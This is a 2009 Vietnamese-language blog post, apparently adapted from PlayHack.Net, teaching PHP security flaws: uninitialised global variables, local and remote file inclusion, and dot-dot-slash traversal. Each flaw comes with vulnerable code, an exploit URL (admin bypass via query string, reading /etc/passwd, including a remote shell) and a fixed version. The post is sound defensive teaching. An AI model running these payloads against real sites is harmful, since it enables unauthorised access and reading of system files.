Thursday, December 31, 2009

PHP Underground Security - File Inclusion

Code minh hoạ lấy từ PlayHack.Net

---[ 0x01: Global Variables] : Biến toàn cục
Biến trong PHP được tạo ra tự động mà không cần khai báo trước khi dùng, nếu gặp $_var là tự tạo biến.
Xem code :
if ($is_admin == 1) {
 
//Yes, I'm the admin so call the
[...]
 
} else {
 
//No, I'm not the admin
[...]
 
}
Bug : if ($is_admin == 1) ~~> trước đó chưa khởi tạo giá trị ban đầu.
Exploite : http://remote_host/bugged.php?is_admin=1

Fixed Code:
$is_admin = 0;
 
[...]
 
 
if ($is_admin == 1) {
 
//Yes, I'm the admin so call the
[...]
 
} else {
 
//No, I'm not the admin
[...]
 
}


---[ 0x02: File Inclusion]
-----[ Local File Inclusion]
PHP là một ngôn ngữ mạnh và đơn giản ~~> nhận xét của tác giả, Jutoms đồng quan điểm.

Bugged Code:
include "/users/".$include_path.".php";
[...]

Như trên, $include_path chưa được khai báo trước
Exploite :
hxxp://remote_host/bugged.php?include_p ... /passwd
~~> list all user on server

Question??
là gì ? ~~> kí tự Null kết thúc chuỗi gặp là tự hiểu kết thúc chuỗi và bỏ qua các kí tự cuối cùng, chính là bỏ cái đuôi .PHP (include "/users/".$include_path.".PHP")-----[ Remote File Inclusion]

Code:
[...]
 
include($_GET['pag']);
 
[...]

~~> Vẫn cái bug $pag chưa được khai báo

Exploite :
Remote : http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]
Cái quen thuộc mà ta hay dùng là :
http://remote_host/inc.php?pag=http://host/../shell.php

View files :
http://remote_host/inc.php?pag=/etc/passwd


Fix, how ? Tạo danh sách được chấp nhận (dùng mảng) :
Code:
[...]
 
$pag = $_GET['pag'];
 
$pages = array('index.php', 'alfa.php', 'beta.php', 'gamma.php');
 
if(in_array($pag, $pages)) {
 
include($pag);
 
} else {
 
die("Hacking Attempt!");
 
}
 
[...] 

Gần với File Inclusion, File Traverse cũng không kém phần nguy hiểm.

File Traverse là gì ?
File Traverse hay còn gọi là "dot-dot-slash" nghĩa là "../", lỗi sinh ra như sau:
[...]
 
$fp = fopen("/path/{$_GET['filename']}.txt", 'r');
 
[...]

Như tên gọi dot-dot-slash, ta sử dụng ../ và NULL Byte để truy cập đến các cấp thư mục cao hơn, vd như:
Code:
http://remote_host/path/bug.php?filename=../../../../path_of_another_file/file
http://remote_host/path/bug.php?filename=../../../../etc/passwd


Fix lỗi:
Sử dụng hàm basename() để cắt bỏ phần trước "/" của đường dẫn, nghĩa là
Code:
$path = "/home/httpd/html/index.php";
 
$file = basename($path); // $file is set to "index.php"


Fixed Code:
$clean = array();
 
if (basename($_GET['filename']) == $_GET['filename']){
 
$clean['filename'] = $_GET['filename'];
 
} else {
 
[...]
 
}
 
$fp = fopen("/path/{$clean['filename']}.txt", 'r');

No comments:

Post a Comment